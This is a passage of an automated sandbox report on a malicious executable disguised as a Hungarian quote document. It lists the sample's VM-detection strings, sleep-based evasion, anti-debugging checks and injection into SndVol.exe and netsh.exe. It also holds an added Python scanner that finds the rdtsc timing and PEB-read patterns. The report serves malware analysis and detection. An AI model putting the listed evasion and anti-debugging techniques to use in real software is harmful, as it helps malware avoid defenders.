Source: C:\Windows\explorer.exe TID: 4464; Thread sleep count: 9763 > 30
Source: C:\Windows\explorer.exe TID: 4464; Thread sleep time: -19526000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4464; Thread sleep count: 181 > 30
Source: C:\Windows\explorer.exe TID: 4464; Thread sleep time: -362000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 2180; Thread sleep count: 1485 > 30
Source: C:\Windows\SysWOW64\netsh.exe TID: 2180; Thread sleep time: -2970000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 2180; Thread sleep count: 8487 > 30
Source: C:\Windows\SysWOW64\netsh.exe TID: 2180; Thread sleep time: -16974000s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029A5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
Source: explorer.exe, 00000006.00000000.1802889312.00000000098A8000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000000.1799656853.0000000009815000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000006.00000000.1799656853.0000000009815000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000006.00000000.1802889312.00000000098A8000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000000.1787918751.0000000001240000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000006.00000000.1802889312.0000000009977000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000006.00000000.1799656853.0000000009815000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000057F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107012452.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107012452.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.000000000982D000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.1802889312.0000000009977000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000003.3492560819.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106881820.0000000007A34000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000006.00000000.1787918751.0000000001240000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000000.1799656853.0000000009660000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000006.00000000.1787918751.0000000001240000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; API call chain: ExitProcess graph end node graph_0-32496
Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Process information queried: ProcessInformation
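
The RDTSC interceptor entries above record the same 8-byte sequence in both injected hosts (two rdtsc instructions six bytes apart with xor ecx, ecx and add ecx, eax between them, at 47C9904/47C990A in SndVol.exe and B89904/B8990A in netsh.exe), and the Anti Debugging section that follows lists dozens of mov eax, dword ptr fs:[00000030h] PEB reads in the same SndVol.exe region. Both are byte patterns a responder can confirm directly in a dumped region. The scanner below is an added example, not code from this report or from Joe Sandbox: the opcode encodings it searches for are the standard 32-bit x86 ones (an assumption, since the report gives mnemonics rather than bytes), and the buffer it runs over is constructed for the demo at the hypothetical base 0x047C9000, padded so the first hit lands at the address the report shows.

```python
"""Scan a dumped region for the rdtsc timing check and PEB reads seen in the report.

Added example, not part of the sandbox report. Opcode encodings are the standard
32-bit x86 ones (assumed; the report lists mnemonics only). SAMPLE is a
constructed buffer, not a dump of the analysed sample.
"""
import re
from typing import Dict, List

# rdtsc ; xor ecx, ecx ; add ecx, eax ; rdtsc  (8 bytes, second rdtsc at +6,
# matching the 47C9904 -> 47C990A spacing in the report). Both ModRM
# encodings of xor and add are accepted: assemblers emit either form.
RDTSC_PAIR = re.compile(
    rb"\x0f\x31"                 # rdtsc
    rb"(?:\x31\xc9|\x33\xc9)"    # xor ecx, ecx
    rb"(?:\x01\xc1|\x03\xc8)"    # add ecx, eax
    rb"\x0f\x31"                 # rdtsc
)

# mov eax, fs:[30h] -> 64 A1 30 00 00 00  or  64 8B 05 30 00 00 00
# mov ecx, fs:[30h] -> 64 8B 0D 30 00 00 00
PEB_READ = re.compile(rb"\x64(?:\xa1|\x8b\x05|\x8b\x0d)\x30\x00\x00\x00")


def find_gadgets(buf: bytes, base: int = 0) -> Dict[str, list]:
    """Return virtual addresses of each gadget in buf, which is mapped at base.

    rdtsc_pairs holds (first_rdtsc, second_rdtsc) tuples, the same shape as the
    report's "First address / second address"; peb_reads holds the address of
    each fs:[30h] load.
    """
    return {
        "rdtsc_pairs": [(base + m.start(), base + m.end() - 2)
                        for m in RDTSC_PAIR.finditer(buf)],
        "peb_reads": [base + m.start() for m in PEB_READ.finditer(buf)],
    }


def classify(buf: bytes, base: int = 0) -> List[str]:
    """Tag a region with the anti-analysis techniques its bytes show."""
    hits = find_gadgets(buf, base)
    tags = []
    if hits["rdtsc_pairs"]:
        tags.append("rdtsc-timing-check")
    if hits["peb_reads"]:
        tags.append("peb-access")
    return tags


# Constructed demo region: NOP padding so the gadget lands at the offset the
# report shows for SndVol.exe (the base is hypothetical, chosen for that).
SAMPLE_BASE = 0x047C9000
SAMPLE = (
    b"\x90" * 0x904
    + b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"   # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    + b"\x90" * 16
    + b"\x64\xa1\x30\x00\x00\x00"           # mov eax, fs:[30h]   (PEB)
    + b"\x8a\x40\x02"                       # mov al, [eax+2]     (PEB.BeingDebugged)
    + b"\x90" * 8
    + b"\x64\x8b\x0d\x30\x00\x00\x00"       # mov ecx, fs:[30h]
)

if __name__ == "__main__":
    for kind, addrs in find_gadgets(SAMPLE, SAMPLE_BASE).items():
        print(kind, [hex(a) if isinstance(a, int) else tuple(map(hex, a))
                     for a in addrs])
    print(classify(SAMPLE, SAMPLE_BASE))
```

Run it over the injected region only (here the 0x365xxxxx range the Anti Debugging entries point at in SndVol.exe), not the whole process: fs:[30h] loads are ordinary TEB-to-PEB accesses that every CRT and ntdll itself perform, so on a full process dump peb-access is noise, while the back-to-back rdtsc pair is the stronger signal. A rule that hard-codes only one of the xor/add encodings will miss the other, which is why both alternatives are in the pattern.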

          Anti Debugging

Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029BF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_047C9AB0 rdtsc
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365D2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B894C LoadLibraryW,GetProcAddress,FreeLibrary
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3662D660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365C9660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36593616 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36665636 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365C1607 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365CF603 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3658F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_366236EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365C16CF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3664D6F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3659B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3664F6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_366516CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365BD6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365876B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3661368C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3658D6AA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365A3740 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36663749 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3663375F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3658B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365CF71F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3664F72E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3665972B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3666B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36597703 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36595702 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3659973A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36589730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365C5734 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36593720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365AF720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365957C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3659D7E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_366197A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3661F7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_366637B6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3664D7B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3658F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365BD7B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3664F78A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3659B440 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3666547F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3663B450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3664F453 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36591460 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365AF460 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365B340D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36617410 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_366394E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_366654DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_366374B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3658B480 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36599486 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365874B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365C34B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365CB570 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3663B550 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3658B562 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3663F525 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_3664B52F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_36665537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365C7505 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_365C7505 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CD530 mov eax, dword ptr fs:[00000030h]5_2_365CD530
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CD530 mov eax, dword ptr fs:[00000030h]5_2_365CD530
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659D534 mov eax, dword ptr fs:[00000030h]5_2_3659D534
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B95DA mov eax, dword ptr fs:[00000030h]5_2_365B95DA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C55C0 mov eax, dword ptr fs:[00000030h]5_2_365C55C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366655C9 mov eax, dword ptr fs:[00000030h]5_2_366655C9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D5D0 mov eax, dword ptr fs:[00000030h]5_2_3660D5D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D5D0 mov ecx, dword ptr fs:[00000030h]5_2_3660D5D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366635D7 mov eax, dword ptr fs:[00000030h]5_2_366635D7
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366635D7 mov eax, dword ptr fs:[00000030h]5_2_366635D7
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366635D7 mov eax, dword ptr fs:[00000030h]5_2_366635D7
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366635B6 mov eax, dword ptr fs:[00000030h]5_2_366635B6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3662D5B0 mov eax, dword ptr fs:[00000030h]5_2_3662D5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3662D5B0 mov eax, dword ptr fs:[00000030h]5_2_3662D5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658758F mov eax, dword ptr fs:[00000030h]5_2_3658758F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658758F mov eax, dword ptr fs:[00000030h]5_2_3658758F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658758F mov eax, dword ptr fs:[00000030h]5_2_3658758F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366235BA mov eax, dword ptr fs:[00000030h]5_2_366235BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366235BA mov eax, dword ptr fs:[00000030h]5_2_366235BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366235BA mov eax, dword ptr fs:[00000030h]5_2_366235BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366235BA mov eax, dword ptr fs:[00000030h]5_2_366235BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F5BE mov eax, dword ptr fs:[00000030h]5_2_3664F5BE
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661B594 mov eax, dword ptr fs:[00000030h]5_2_3661B594
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661B594 mov eax, dword ptr fs:[00000030h]5_2_3661B594
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665D26B mov eax, dword ptr fs:[00000030h]5_2_3665D26B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665D26B mov eax, dword ptr fs:[00000030h]5_2_3665D26B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C724D mov eax, dword ptr fs:[00000030h]5_2_365C724D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589240 mov eax, dword ptr fs:[00000030h]5_2_36589240
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589240 mov eax, dword ptr fs:[00000030h]5_2_36589240
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D1270 mov eax, dword ptr fs:[00000030h]5_2_365D1270
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D1270 mov eax, dword ptr fs:[00000030h]5_2_365D1270
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B9274 mov eax, dword ptr fs:[00000030h]5_2_365B9274
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664B256 mov eax, dword ptr fs:[00000030h]5_2_3664B256
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664B256 mov eax, dword ptr fs:[00000030h]5_2_3664B256
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665227 mov eax, dword ptr fs:[00000030h]5_2_36665227
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C7208 mov eax, dword ptr fs:[00000030h]5_2_365C7208
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C7208 mov eax, dword ptr fs:[00000030h]5_2_365C7208
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366652E2 mov eax, dword ptr fs:[00000030h]5_2_366652E2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B2D3 mov eax, dword ptr fs:[00000030h]5_2_3658B2D3
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B2D3 mov eax, dword ptr fs:[00000030h]5_2_3658B2D3
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B2D3 mov eax, dword ptr fs:[00000030h]5_2_3658B2D3
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF2D0 mov eax, dword ptr fs:[00000030h]5_2_365BF2D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF2D0 mov eax, dword ptr fs:[00000030h]5_2_365BF2D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B2F0 mov eax, dword ptr fs:[00000030h]5_2_3663B2F0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B2F0 mov eax, dword ptr fs:[00000030h]5_2_3663B2F0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
